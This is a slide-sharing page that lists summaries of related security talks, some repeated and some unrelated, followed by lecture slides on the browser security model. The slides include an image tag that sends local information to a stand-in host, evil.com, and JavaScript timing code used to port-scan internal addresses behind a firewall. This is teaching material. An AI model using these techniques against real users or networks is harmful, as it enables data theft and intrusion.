This document provides an introduction to web security and the browser security model. It discusses goals of web security including safely browsing the web and supporting secure web applications. It outlines common web threat models and covers topics like HTTP, rendering content, isolation using frames and same-origin policy, communication between frames, frame navigation policies, client state using cookies, and clickjacking. The document aims to provide background knowledge on how the web and browsers work from a security perspective.
This talk is a generic but comprehensive overview of security mechanism, controls and potential attacks in modern browsers. The talk focuses also on new technologies, such as HTML5 and related APIs to highlight new attack scenario against browsers.
Web development involves creating websites for the Internet. Web pages can be static, with fixed content, or dynamic, where content can change on the client side. HTML5 is the latest version of HTML and introduces new markup elements, input types, and form attributes. It also supports audio and video elements. CSS3 adds new selectors, properties and values for styling and layout. PHP is a server-side scripting language commonly used for web development. Popular PHP frameworks like Yii, CodeIgniter and Zend help support the development of dynamic websites and applications.
Many notable and new web hacking techniques, discoveries and compromises were uncovered in 2008. During his session, the top 10 vulnerabilities present in 2008, as well as some of the prevalent security issues emerging in 2009. Attendees will virtually be able to walk through the vulnerabilities appearing on today’s corporate websites, learning real-world solutions to today’s web application security issues.
Moderator: Mike Stephenson, SC lab manager, SC Magazine
- Jeremiah Grossman, founder and chief technology officer, WhiteHat Security
Silverlight is a Microsoft technology that allows for the development of rich internet applications. It uses XAML and .NET to build interfaces in a declarative manner. Silverlight applications can access web services and media, use data binding, and integrate with HTML and JavaScript. The presentation focused on the core features of Silverlight including controls, data binding, advanced media capabilities, and cross-browser deployment options.
Web 2.0 applications involve increased security risks due to their use of asynchronous JavaScript and XML (AJAX) to dynamically update pages. Key security considerations for Web 2.0 include access control, integrity, availability, and privacy/confidentiality. Developers must validate all user-supplied data to prevent attacks like cross-site scripting, enforce access controls, and use encryption to protect private data transmitted in queries.
Dom Hackking & Security - BlackHat PresoShreeraj Shah
The document discusses vulnerabilities in web applications that make extensive use of DOM manipulation. It notes that DOM manipulation through JavaScript calls can allow attackers to exploit cross-site scripting (XSS) vulnerabilities. It also discusses how DOM hacking could enable attacks like cross-domain bypassing, stealing sensitive variables, injecting malicious code, and spreading worms. The author aims to cover vulnerabilities in AJAX applications and techniques for detecting DOM-based XSS through scanning and tools. Mitigation strategies are also discussed.
This talk is a generic but comprehensive overview of security mechanism, controls and potential attacks in modern browsers. The talk focuses also on new technologies, such as HTML5 and related APIs to highlight new attack scenario against browsers.
Web development involves creating websites for the Internet. Web pages can be static, with fixed content, or dynamic, where content can change on the client side. HTML5 is the latest version of HTML and introduces new markup elements, input types, and form attributes. It also supports audio and video elements. CSS3 adds new selectors, properties and values for styling and layout. PHP is a server-side scripting language commonly used for web development. Popular PHP frameworks like Yii, CodeIgniter and Zend help support the development of dynamic websites and applications.
Many notable and new web hacking techniques, discoveries and compromises were uncovered in 2008. During his session, the top 10 vulnerabilities present in 2008, as well as some of the prevalent security issues emerging in 2009. Attendees will virtually be able to walk through the vulnerabilities appearing on today’s corporate websites, learning real-world solutions to today’s web application security issues.
Moderator: Mike Stephenson, SC lab manager, SC Magazine
- Jeremiah Grossman, founder and chief technology officer, WhiteHat Security
Silverlight is a Microsoft technology that allows for the development of rich internet applications. It uses XAML and .NET to build interfaces in a declarative manner. Silverlight applications can access web services and media, use data binding, and integrate with HTML and JavaScript. The presentation focused on the core features of Silverlight including controls, data binding, advanced media capabilities, and cross-browser deployment options.
Web 2.0 applications involve increased security risks due to their use of asynchronous JavaScript and XML (AJAX) to dynamically update pages. Key security considerations for Web 2.0 include access control, integrity, availability, and privacy/confidentiality. Developers must validate all user-supplied data to prevent attacks like cross-site scripting, enforce access controls, and use encryption to protect private data transmitted in queries.
Dom Hackking & Security - BlackHat PresoShreeraj Shah
The document discusses vulnerabilities in web applications that make extensive use of DOM manipulation. It notes that DOM manipulation through JavaScript calls can allow attackers to exploit cross-site scripting (XSS) vulnerabilities. It also discusses how DOM hacking could enable attacks like cross-domain bypassing, stealing sensitive variables, injecting malicious code, and spreading worms. The author aims to cover vulnerabilities in AJAX applications and techniques for detecting DOM-based XSS through scanning and tools. Mitigation strategies are also discussed.
This document discusses the top 10 web hacking techniques of 2012. It provides an overview of each technique including CRIME, attacking memcached via SSRF, Chrome addon hacking, bruteforcing PHPSESSID, blended threats using JavaScript, cross-site port attacks, permanently backdooring HTML5 client-side applications using local storage, CAPTCHA re-riding attacks, gaining access to HttpOnly cookies in 2012 through Java applets, and attacking OData through HTTP verb tunneling and navigation properties. The document also discusses the history of past web hacking techniques and provides background information on topics like HttpOnly cookies, XST, and CAPTCHAs.
Top 10 Web Hacks
Every year the number and creativity of Web hacks increases, and the damage from these attacks rises exponentially, costing organizations millions every year.
Join this webinar to learn about the latest and most insidious Web-based attacks. The much anticipated list, now in its seventh year, represents exhaustive research conducted by a panel of experienced security industry professionals. Learn the latest of the worst in Web hacks, and how to protect your organization.
Dans cette session, Chris Wilson parlera d’Internet Explorer 8 et de ses avancées en termes de conformité aux standards et de prise en charge d’AJAX. Il illustrera aussi les nouvelles possibilités qui s’offrent aux responsables de sites Web.
The document provides an overview of secure web messaging in HTML5. It discusses how traditional methods of communication like JavaScript, AJAX, and frames had limitations due to the same-origin policy. The HTML5 postMessage API allows for secure cross-origin communication between frames by abstracting multiple principals. While more secure than previous techniques, the postMessage API still requires careful configuration of target origins, validation of received data, and mitigation of framing attacks to prevent security issues like cross-site scripting.
Thug is a new low-interaction honeyclient for analyzing malicious web content and browser exploitation. It uses the Google V8 JavaScript engine and emulates different browser personalities to detect exploits. Thug analyzes content using static and dynamic analysis and logs results using MAEC format. Future work includes improving DOM emulation and JavaScript analysis to better identify vulnerabilities and exploit kits. The source code for Thug will be publicly released after the presentation.
Building Social Enterprise with Ruby and SalesforceRaymond Gao
This was my presentation at the Oct 4th, Dallas Ruby Brigade night. It covers Lean Methodology and using DatabaseDotCom and Ruby
Source Code
https://github.com/raygao/DallasRubyPresentation
The document provides an overview of key technical aspects of web design, including server-side technologies, client-side technologies like JavaScript and CSS, content management systems, and Web 2.0 features like social networking and Ajax. It discusses topics like browser market share, HTML, HTTP, popular web servers, programming languages, the document object model, CSS techniques, open-source CMS options, characteristics of Web 2.0 sites, the growth of social networking, Ajax goals and examples of its use, and popular Ajax frameworks.
Ethical hacking Chapter 10 - Exploiting Web Servers - Eric VanderburgEric Vanderburg
This document discusses exploiting vulnerabilities in web servers. It describes common components of web applications like forms, CGI, ASP, and scripting languages. It also outlines vulnerabilities like SQL injection, cross-site scripting, and improper authentication. Tools for assessing these vulnerabilities are presented, including cgiscan, wfetch, and the OWASP WebGoat project for learning about attacking web applications. The importance of understanding the platform and technologies used to develop a web application is emphasized to determine the appropriate security tests.
This document discusses browser security challenges posed by new technologies like HTML5, cross-document messaging, and browser plugins. It summarizes potential attacks like cross-site scripting through relaxed origin policies, browser SQL injection using HTML5 client storage, and using cross-document messaging to enable cross-site communication. The document advocates for the OWASP Intrinsic Group to work with browser vendors to address these issues.
21. Application Development and Administration in DBMSkoolkampus
The document provides an overview of web interfaces to databases and techniques for improving web application performance. It discusses how databases can be interfaced with the web to allow users to access data from anywhere. It then covers topics like dynamic page generation, sessions, cookies, servlets, server-side scripting, and techniques for improving web server performance like caching. The document also discusses performance tuning at the hardware, database, and transaction levels to identify and address bottlenecks.
This document summarizes Mario Heiderich's presentation titled "Locking the Throne Room - How ES5+ will change XSS and Client Side Security" given at BlueHat, Redmond 2011. The presentation discusses how new features in ECMAScript 5 (ES5), such as Object.defineProperty(), can be used to prevent cross-site scripting (XSS) attacks by locking down access to sensitive DOM properties and methods on the client-side in a tamper-resistant way. This moves XSS mitigation closer to the client where the attacks occur, avoiding issues caused by impedance mismatches between server-side filters and client-side execution. The approach could allow role-based access control and intrusion
This document provides instructions for customizing Dreamweaver to produce XHTML compliant web pages and creating a basic web page. It describes how to set preferences in Dreamweaver to enable auto tag completion, format code as XHTML, and validate pages as XHTML 1.0 Transitional. Instructions are given for opening a new XHTML document and adding sample content and a title. The document aims to enable the creation of a simple but well-designed website using Dreamweaver and XHTML.
1. Cross-site scripting (XSS) allows a malicious script placed on one site to run in a user's browser when they visit another trusted site. This can steal sensitive data like cookies or account credentials.
2. SQL injection occurs when user-supplied input is incorrectly inserted into an SQL query, allowing an attacker to manipulate the query for malicious purposes like accessing unauthorized data.
3. Cross-site request forgery (CSRF) tricks a user's browser into making requests to a trusted site where the user is currently authenticated. This can perform actions like changing account settings without the user's knowledge or consent if the browser sends stored authentication cookies.
The document discusses various security issues that can occur on web portals, including cross-site scripting (XSS) vulnerabilities that allow altering of content or stealing cookies, and cross-site request forgery (CSRF) attacks. It provides examples of how these attacks can be carried out, such as using XSS to change website branding or send a user's cookies to an attacker. The document recommends mitigation techniques like input filtering, consistency checks, and tying sessions to IP addresses to help prevent these types of attacks.
Application and Website Security -- Fundamental EditionDaniel Owens
The document provides an agenda for a course on application and website security. The agenda covers common input validation flaws like SQL injection and cross-site scripting, access control flaws like session hijacking, encryption flaws, security tools, and concludes with additional resources for further information. The document uses examples to demonstrate various security vulnerabilities and how they can be exploited.
The document discusses various web application security vulnerabilities such as hidden field manipulation, parameter tampering, cross-site scripting, and SQL injection. It provides examples of how attackers can exploit these vulnerabilities and recommendations for developers on how to prevent attacks, including sanitizing user input, encrypting cookies, and validating parameters.
Web Application Security: The Land that Information Security ForgotJeremiah Grossman
Web Application Security: The Land that Information Security Forgot
Today, the vast majority of those within information security have heard about web application security and posses at least a vague understanding of the risks involved. However, the multitude of attacks which make this area of security important, for the most part, go undocumented, unexplained and misunderstood. As a result, our web applications become undefended and at the mercy of a determined attacker. In order to gain a deeper understanding of the threats, witnessing these attacks first hand is essential.
Make no mistake, insecure and unprotected web applications are the fastest, easiest, and arguably the most utilized route to compromise networks and exploit users. What's worse is that conventional security measures lack the proper safeguards and offer little protection, resulting in nothing more than a "false sense of security".
This discussion will cover theory surrounding some of the more dangerous web application attacks, examples of the attack in action, and possible countermeasures.
Founder and chairman of WhiteHat Security, and former information security officer with Yahoo!. As information security officer at Yahoo!, Jeremiah was designing, auditing, and penetration-testing the huge company's web applications which demand highest security.
During his past 5 years of employment, Jeremiah has been researching and applying information security with special emphasis on prevention of web application sabotage. Grossman has presented "Web Application Security" talks at many security conventions such as the Defcon, Air Force and Technology Conference, ToorCon, and others.
Jeremiah is a lead contributor to the "Open Web Application Security Project" www.owasp.com and considered to be among the foremost web security experts.
Owasp Top 10 - Owasp Pune Chapter - January 2008abhijitapatil
The document discusses various cybersecurity topics including vulnerabilities, threats, attacks, and countermeasures. It provides an overview of the Open Web Application Security Project (OWASP) which focuses on improving application security. It also summarizes common web vulnerabilities like cross-site scripting (XSS), SQL injection, buffer overflows, and cross-site request forgery (CSRF). Recommendations are given to prevent these vulnerabilities.
The document provides an introduction to basic web architecture, including HTML, URIs, HTTP, cookies, database-driven websites, AJAX, web services, XML, and JSON. It discusses how the web is a two-tiered architecture with a web browser displaying information from a web server. Key components like HTTP requests and responses are outlined. Extension of web architecture with server-side processing using languages like PHP and client-side processing with JavaScript are also summarized.
This document discusses client-side controls for restricting user input in web applications. It describes how client-side controls like HTML forms, JavaScript validation, Java applets, and ActiveX controls can validate user input. However, all client-side controls are vulnerable because they run on untrusted clients and can be bypassed. The document recommends validating all user input on the server-side and not trusting any client-side validation. It also discusses techniques attackers use like decompiling bytecode and monitoring processes to bypass client-side controls.
Climate Impact of Software Testing at Nordic Testing DaysKari Kakkonen
My slides at Nordic Testing Days 6.6.2024
Climate impact / sustainability of software testing discussed on the talk. ICT and testing must carry their part of global responsibility to help with the climat warming. We can minimize the carbon footprint but we can also have a carbon handprint, a positive impact on the climate. Quality characteristics can be added with sustainability, and then measured continuously. Test environments can be used less, and in smaller scale and on demand. Test techniques can be used in optimizing or minimizing number of tests. Test automation can be used to speed up testing.
Threats to mobile devices are more prevalent and increasing in scope and complexity. Users of mobile devices desire to take full advantage of the features
available on those devices, but many of the features provide convenience and capability but sacrifice security. This best practices guide outlines steps the users can take to better protect personal devices and information.
This document discusses the top 10 web hacking techniques of 2012. It provides an overview of each technique including CRIME, attacking memcached via SSRF, Chrome addon hacking, bruteforcing PHPSESSID, blended threats using JavaScript, cross-site port attacks, permanently backdooring HTML5 client-side applications using local storage, CAPTCHA re-riding attacks, gaining access to HttpOnly cookies in 2012 through Java applets, and attacking OData through HTTP verb tunneling and navigation properties. The document also discusses the history of past web hacking techniques and provides background information on topics like HttpOnly cookies, XST, and CAPTCHAs.
Top 10 Web Hacks
Every year the number and creativity of Web hacks increases, and the damage from these attacks rises exponentially, costing organizations millions every year.
Join this webinar to learn about the latest and most insidious Web-based attacks. The much anticipated list, now in its seventh year, represents exhaustive research conducted by a panel of experienced security industry professionals. Learn the latest of the worst in Web hacks, and how to protect your organization.
Dans cette session, Chris Wilson parlera d’Internet Explorer 8 et de ses avancées en termes de conformité aux standards et de prise en charge d’AJAX. Il illustrera aussi les nouvelles possibilités qui s’offrent aux responsables de sites Web.
The document provides an overview of secure web messaging in HTML5. It discusses how traditional methods of communication like JavaScript, AJAX, and frames had limitations due to the same-origin policy. The HTML5 postMessage API allows for secure cross-origin communication between frames by abstracting multiple principals. While more secure than previous techniques, the postMessage API still requires careful configuration of target origins, validation of received data, and mitigation of framing attacks to prevent security issues like cross-site scripting.
Thug is a new low-interaction honeyclient for analyzing malicious web content and browser exploitation. It uses the Google V8 JavaScript engine and emulates different browser personalities to detect exploits. Thug analyzes content using static and dynamic analysis and logs results using MAEC format. Future work includes improving DOM emulation and JavaScript analysis to better identify vulnerabilities and exploit kits. The source code for Thug will be publicly released after the presentation.
Building Social Enterprise with Ruby and SalesforceRaymond Gao
This was my presentation at the Oct 4th, Dallas Ruby Brigade night. It covers Lean Methodology and using DatabaseDotCom and Ruby
Source Code
https://github.com/raygao/DallasRubyPresentation
The document provides an overview of key technical aspects of web design, including server-side technologies, client-side technologies like JavaScript and CSS, content management systems, and Web 2.0 features like social networking and Ajax. It discusses topics like browser market share, HTML, HTTP, popular web servers, programming languages, the document object model, CSS techniques, open-source CMS options, characteristics of Web 2.0 sites, the growth of social networking, Ajax goals and examples of its use, and popular Ajax frameworks.
Ethical hacking Chapter 10 - Exploiting Web Servers - Eric VanderburgEric Vanderburg
This document discusses exploiting vulnerabilities in web servers. It describes common components of web applications like forms, CGI, ASP, and scripting languages. It also outlines vulnerabilities like SQL injection, cross-site scripting, and improper authentication. Tools for assessing these vulnerabilities are presented, including cgiscan, wfetch, and the OWASP WebGoat project for learning about attacking web applications. The importance of understanding the platform and technologies used to develop a web application is emphasized to determine the appropriate security tests.
This document discusses browser security challenges posed by new technologies like HTML5, cross-document messaging, and browser plugins. It summarizes potential attacks like cross-site scripting through relaxed origin policies, browser SQL injection using HTML5 client storage, and using cross-document messaging to enable cross-site communication. The document advocates for the OWASP Intrinsic Group to work with browser vendors to address these issues.
21. Application Development and Administration in DBMSkoolkampus
The document provides an overview of web interfaces to databases and techniques for improving web application performance. It discusses how databases can be interfaced with the web to allow users to access data from anywhere. It then covers topics like dynamic page generation, sessions, cookies, servlets, server-side scripting, and techniques for improving web server performance like caching. The document also discusses performance tuning at the hardware, database, and transaction levels to identify and address bottlenecks.
This document summarizes Mario Heiderich's presentation titled "Locking the Throne Room - How ES5+ will change XSS and Client Side Security" given at BlueHat, Redmond 2011. The presentation discusses how new features in ECMAScript 5 (ES5), such as Object.defineProperty(), can be used to prevent cross-site scripting (XSS) attacks by locking down access to sensitive DOM properties and methods on the client-side in a tamper-resistant way. This moves XSS mitigation closer to the client where the attacks occur, avoiding issues caused by impedance mismatches between server-side filters and client-side execution. The approach could allow role-based access control and intrusion
This document provides instructions for customizing Dreamweaver to produce XHTML compliant web pages and creating a basic web page. It describes how to set preferences in Dreamweaver to enable auto tag completion, format code as XHTML, and validate pages as XHTML 1.0 Transitional. Instructions are given for opening a new XHTML document and adding sample content and a title. The document aims to enable the creation of a simple but well-designed website using Dreamweaver and XHTML.
1. Cross-site scripting (XSS) allows a malicious script placed on one site to run in a user's browser when they visit another trusted site. This can steal sensitive data like cookies or account credentials.
2. SQL injection occurs when user-supplied input is incorrectly inserted into an SQL query, allowing an attacker to manipulate the query for malicious purposes like accessing unauthorized data.
3. Cross-site request forgery (CSRF) tricks a user's browser into making requests to a trusted site where the user is currently authenticated. This can perform actions like changing account settings without the user's knowledge or consent if the browser sends stored authentication cookies.
The document discusses various security issues that can occur on web portals, including cross-site scripting (XSS) vulnerabilities that allow altering of content or stealing cookies, and cross-site request forgery (CSRF) attacks. It provides examples of how these attacks can be carried out, such as using XSS to change website branding or send a user's cookies to an attacker. The document recommends mitigation techniques like input filtering, consistency checks, and tying sessions to IP addresses to help prevent these types of attacks.
Application and Website Security -- Fundamental EditionDaniel Owens
The document provides an agenda for a course on application and website security. The agenda covers common input validation flaws like SQL injection and cross-site scripting, access control flaws like session hijacking, encryption flaws, security tools, and concludes with additional resources for further information. The document uses examples to demonstrate various security vulnerabilities and how they can be exploited.
The document discusses various web application security vulnerabilities such as hidden field manipulation, parameter tampering, cross-site scripting, and SQL injection. It provides examples of how attackers can exploit these vulnerabilities and recommendations for developers on how to prevent attacks, including sanitizing user input, encrypting cookies, and validating parameters.
Web Application Security: The Land that Information Security ForgotJeremiah Grossman
Web Application Security: The Land that Information Security Forgot
Today, the vast majority of those within information security have heard about web application security and posses at least a vague understanding of the risks involved. However, the multitude of attacks which make this area of security important, for the most part, go undocumented, unexplained and misunderstood. As a result, our web applications become undefended and at the mercy of a determined attacker. In order to gain a deeper understanding of the threats, witnessing these attacks first hand is essential.
Make no mistake, insecure and unprotected web applications are the fastest, easiest, and arguably the most utilized route to compromise networks and exploit users. What's worse is that conventional security measures lack the proper safeguards and offer little protection, resulting in nothing more than a "false sense of security".
This discussion will cover theory surrounding some of the more dangerous web application attacks, examples of the attack in action, and possible countermeasures.
Founder and chairman of WhiteHat Security, and former information security officer with Yahoo!. As information security officer at Yahoo!, Jeremiah was designing, auditing, and penetration-testing the huge company's web applications which demand highest security.
During his past 5 years of employment, Jeremiah has been researching and applying information security with special emphasis on prevention of web application sabotage. Grossman has presented "Web Application Security" talks at many security conventions such as the Defcon, Air Force and Technology Conference, ToorCon, and others.
Jeremiah is a lead contributor to the "Open Web Application Security Project" www.owasp.com and considered to be among the foremost web security experts.
Owasp Top 10 - Owasp Pune Chapter - January 2008abhijitapatil
The document discusses various cybersecurity topics including vulnerabilities, threats, attacks, and countermeasures. It provides an overview of the Open Web Application Security Project (OWASP) which focuses on improving application security. It also summarizes common web vulnerabilities like cross-site scripting (XSS), SQL injection, buffer overflows, and cross-site request forgery (CSRF). Recommendations are given to prevent these vulnerabilities.
The document provides an introduction to basic web architecture, including HTML, URIs, HTTP, cookies, database-driven websites, AJAX, web services, XML, and JSON. It discusses how the web is a two-tiered architecture with a web browser displaying information from a web server. Key components like HTTP requests and responses are outlined. Extension of web architecture with server-side processing using languages like PHP and client-side processing with JavaScript are also summarized.
This document discusses client-side controls for restricting user input in web applications. It describes how client-side controls like HTML forms, JavaScript validation, Java applets, and ActiveX controls can validate user input. However, all client-side controls are vulnerable because they run on untrusted clients and can be bypassed. The document recommends validating all user input on the server-side and not trusting any client-side validation. It also discusses techniques attackers use like decompiling bytecode and monitoring processes to bypass client-side controls.
Climate Impact of Software Testing at Nordic Testing DaysKari Kakkonen
My slides at Nordic Testing Days 6.6.2024
Climate impact / sustainability of software testing discussed on the talk. ICT and testing must carry their part of global responsibility to help with the climat warming. We can minimize the carbon footprint but we can also have a carbon handprint, a positive impact on the climate. Quality characteristics can be added with sustainability, and then measured continuously. Test environments can be used less, and in smaller scale and on demand. Test techniques can be used in optimizing or minimizing number of tests. Test automation can be used to speed up testing.
Threats to mobile devices are more prevalent and increasing in scope and complexity. Users of mobile devices desire to take full advantage of the features
available on those devices, but many of the features provide convenience and capability but sacrifice security. This best practices guide outlines steps the users can take to better protect personal devices and information.
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!SOFTTECHHUB
As the digital landscape continually evolves, operating systems play a critical role in shaping user experiences and productivity. The launch of Nitrux Linux 3.5.0 marks a significant milestone, offering a robust alternative to traditional systems such as Windows 11. This article delves into the essence of Nitrux Linux 3.5.0, exploring its unique features, advantages, and how it stands as a compelling choice for both casual users and tech enthusiasts.
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slackshyamraj55
Discover the seamless integration of RPA (Robotic Process Automation), COMPOSER, and APM with AWS IDP enhanced with Slack notifications. Explore how these technologies converge to streamline workflows, optimize performance, and ensure secure access, all while leveraging the power of AWS IDP and real-time communication via Slack notifications.
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc
How does your privacy program stack up against your peers? What challenges are privacy teams tackling and prioritizing in 2024?
In the fifth annual Global Privacy Benchmarks Survey, we asked over 1,800 global privacy professionals and business executives to share their perspectives on the current state of privacy inside and outside of their organizations. This year’s report focused on emerging areas of importance for privacy and compliance professionals, including considerations and implications of Artificial Intelligence (AI) technologies, building brand trust, and different approaches for achieving higher privacy competence scores.
See how organizational priorities and strategic approaches to data security and privacy are evolving around the globe.
This webinar will review:
- The top 10 privacy insights from the fifth annual Global Privacy Benchmarks Survey
- The top challenges for privacy leaders, practitioners, and organizations in 2024
- Key themes to consider in developing and maintaining your privacy program
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024Neo4j
Neha Bajwa, Vice President of Product Marketing, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfMalak Abu Hammad
Discover how MongoDB Atlas and vector search technology can revolutionize your application's search capabilities. This comprehensive presentation covers:
* What is Vector Search?
* Importance and benefits of vector search
* Practical use cases across various industries
* Step-by-step implementation guide
* Live demos with code snippets
* Enhancing LLM capabilities with vector search
* Best practices and optimization strategies
Perfect for developers, AI enthusiasts, and tech leaders. Learn how to leverage MongoDB Atlas to deliver highly relevant, context-aware search results, transforming your data retrieval process. Stay ahead in tech innovation and maximize the potential of your applications.
#MongoDB #VectorSearch #AI #SemanticSearch #TechInnovation #DataScience #LLM #MachineLearning #SearchTechnology
“An Outlook of the Ongoing and Future Relationship between Blockchain Technologies and Process-aware Information Systems.” Invited talk at the joint workshop on Blockchain for Information Systems (BC4IS) and Blockchain for Trusted Data Sharing (B4TDS), co-located with with the 36th International Conference on Advanced Information Systems Engineering (CAiSE), 3 June 2024, Limassol, Cyprus.
AI 101: An Introduction to the Basics and Impact of Artificial IntelligenceIndexBug
Imagine a world where machines not only perform tasks but also learn, adapt, and make decisions. This is the promise of Artificial Intelligence (AI), a technology that's not just enhancing our lives but revolutionizing entire industries.
Maruthi Prithivirajan, Head of ASEAN & IN Solution Architecture, Neo4j
Get an inside look at the latest Neo4j innovations that enable relationship-driven intelligence at scale. Learn more about the newest cloud integrations and product enhancements that make Neo4j an essential choice for developers building apps with interconnected data and generative AI.
GraphRAG for Life Science to increase LLM accuracyTomaz Bratanic
GraphRAG for life science domain, where you retriever information from biomedical knowledge graphs using LLMs to increase the accuracy and performance of generated answers
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...SOFTTECHHUB
The choice of an operating system plays a pivotal role in shaping our computing experience. For decades, Microsoft's Windows has dominated the market, offering a familiar and widely adopted platform for personal and professional use. However, as technological advancements continue to push the boundaries of innovation, alternative operating systems have emerged, challenging the status quo and offering users a fresh perspective on computing.
One such alternative that has garnered significant attention and acclaim is Nitrux Linux 3.5.0, a sleek, powerful, and user-friendly Linux distribution that promises to redefine the way we interact with our devices. With its focus on performance, security, and customization, Nitrux Linux presents a compelling case for those seeking to break free from the constraints of proprietary software and embrace the freedom and flexibility of open-source computing.
6. Web vs System vulnerabilities
Decline in % web vulnerabilities since 2009
§ 49% in 2010 -> 37% in 2011.
§ Big decline in SQL Injection vulnerabilities
XSS peak
7. Web application vulnerabilities
49% 51%
Web Application Vulnerabilities
as a Percentage of All Disclosures in 2010
Web Applications (49%) Others (51%)
37%
63%
Web Application Vulnerabilities
as a Percentage of All Disclosures in 2011 H1
Web Applications (49%) Others (51%)
8.
9. Web Security Challenge
Bad Server
Good server
User
How can honest users safely interact with
well-intentioned sites, while still freely
browsing the web (search, shopping, etc.) ?
Network
Enter password?
Can also operate as
client to other servers
Browser
10. Goals of web security
Safely browse the web
§ Users should be able to visit a variety of web sites, without incurring harm:
› No stolen information (without user’s permission)
› Site A cannot compromise session at Site B
Support secure web applications
§ Applications delivered over the web should have the same security properties we
require for stand-alone applications
And
§ Since many mobile apps are interfaces to web sites,
§ Support security for mobile apps.
11. Web Threat Models
Web attacker
§ Control attacker.com
§ Can obtain SSL/TLS certificate for attacker.com
§ User visits attacker.com
› Or: runs attacker’s Facebook app
Network attacker
§ Passive: Wireless eavesdropper
§ Active: Evil router, DNS poisoning
Malware attacker
§ Attacker escapes browser isolation mechanisms and run
separately under control of OS
14. Uniform Resource Locator (URL)
Global identifier of network-retrievable content
Example:
http://stanford.edu:81/class?name=cs155#homework
Special characters are encoded as hex:
§ %0A = newline
§ %20 or + = space, %2B = + (special exception)
Protocol
Hostname
Port Path
Query
Fragment
15. GET /index.html HTTP/1.1
Accept: image/gif, image/x-bitmap, image/jpeg, */*
Accept-Language: en
Connection: Keep-Alive
User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)
Host: www.example.com
Referer: http://www.google.com?q=dingbats
HTTP Request
Method File HTTP version Headers
Data – none for GET
Blank line
GET : no side effect POST : possible side effect
16. HTTP/1.0 200 OK
Date: Sun, 21 Apr 1996 02:20:42 GMT
Server: Microsoft-Internet-Information-Server/5.0
Connection: keep-alive
Content-Type: text/html
Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT
Set-Cookie: …
Content-Length: 2543
<HTML> Some data... blah, blah, blah </HTML>
HTTP Response
HTTP version Status code Reason phrase Headers
Data
Cookies
19. Browser execution model
Each browser window or frame
§ Loads content
§ Renders it
› Processes HTML and scripts to display page
› May involve images, subframes, etc.
§ Responds to events
Events can be
§ User actions: OnClick, OnMouseover
§ Rendering: OnLoad, OnBeforeUnload
§ Timing: setTimeout(), clearTimeout()
20. <head>
<title>Washington Post: Breaking News, World, US, DC News .. Analysis</title>
...
</head>
<body class="eidos homepage sectionfront">
<script type="text/javascript">
if(self!==top&&!(top.window.location.pathname).startsWith('/PortalEdito
r')){top.location=self.location;}
</script>
...
<h2 class="headline"><a href="/world/national-security/nsa-gathered-
thousands-of-americans-e-mails-before-court-struck-down-
program/2013/08/21/146ba4b6-0a90-11e3-b87c-476db8ac34cd_story.html">
Secret court: <br>NSA gathered thousands of domestic e-mails</a>
...
<p class="byline">Ellen Nakashima …</p>
<p class="">
The program unlawfully gathered as many as tens of thousands of e-mails,
according to a 2011 opinion.</p>
...
<div class="hide"><img class=""
src="http://ad.doubleclick.net/ad/N4359.washingtonpost.com/B7241351.19;sz=1x1
;ord=[timestamp]?" width="1" height="1" border="0" style="display: inline-
block; "></div>
...
Share this video:
...
<a class="facebook_static"
onclick="TWP.Module.SocialButtons.staticSocialPopup('http://www.facebook.com/
sharer.php?u=http://www.washingtonpost.com/posttv/video/thefold/tonight-on-
the-fold-august-21-2013/2013/08/21/36ed282c-0a98-11e3-9941-
6711ed662e71_video.html%3Ffb_ref%3Dsm_btn_fb')">
...
21. Document Object Model (DOM)
Object-oriented interface used to read and write docs
§ web page in HTML is structured data
§ DOM provides representation of this hierarchy
Examples
§ Properties: document.alinkColor, document.URL,
document.forms[ ], document.links[ ], document.anchors[ ]
§ Methods: document.write(document.referrer)
Includes Browser Object Model (BOM)
§ window, document, frames[], history, location, navigator (type
and version of browser)
22. Changing HTML using Script, DOM
Some possibilities
§ createElement(elementName)
§ createTextNode(text)
§ appendChild(newChild)
§ removeChild(node)
Example: Add a new list item:
var list = document.getElementById('t1')
var newitem = document.createElement('li')
var newtext = document.createTextNode(text)
list.appendChild(newitem)
newitem.appendChild(newtext)
<ul id="t1">
<li> Item 1 </li>
</ul>
HTML
23. HTML Image Tags
Displays this nice picture è
Security issues?
<html>
…
<p> … </p>
…
<img src=“http://example.com/sunset.gif” height="50" width="100">
…
</html>
Basic web functionality
24. Image tag security issues
Communicate with other sites
§ <img src=“http://evil.com/pass-local-information.jpg?extra_information”>
Hide resulting image
§ <img src=“ … ” height=“1" width=“1">
Spoof other sites
§ Add logos that fool a user
Important Point: A web page can send information to any site
Security consequences
25. JavaScript onError
Basic function
§ Triggered when error occurs loading a document or an image
Example
§ Runs onError handler if image does not exist and cannot load
<img src="image.gif"
onerror="alert('The image could not be loaded.')“
>
http://www.w3schools.com/jsref/jsref_onError.asp
Basic web functionality
26. JavaScript timing
Sample code
§ When response header indicates that page is not an image, the browser
stops and notifies JavaScript via the onerror handler.
<html><body><img id="test" style="display: none">
<script>
var test = document.getElementById(’test’);
var start = new Date();
test.onerror = function() {
var end = new Date();
alert("Total time: " + (end - start));
}
test.src = "http://www.example.com/page.html";
</script>
</body></html>
Basic web functionality
27. Port scanning behind firewall
JavaScript can:
§ Request images from internal IP addresses
› Example: <img src=“192.168.0.4:8080”/>
§ Use timeout/onError to determine success/failure
§ Fingerprint webapps using known image names
Server
Malicious
Web page
Firewall
1) “show me dancing pigs!”
2) “check this out”
Browser
scan
scan
scan
3) port scan results
Basic web functionality
28. Remote scripting
Goal
§ Exchange data between a client-side app running in a browser and server-side app, without reloading page
Methods
§ Java Applet/ActiveX control/Flash
› Can make HTTP requests and interact with client-side JavaScript code, but requires LiveConnect (not available on all browsers)
§ XML-RPC
› open, standards-based technology that requires XML-RPC libraries on server and in your client-side code.
§ Simple HTTP via a hidden IFRAME
› IFRAME with a script on your web server (or database of static HTML files) is by far the easiest of the three remote scripting options
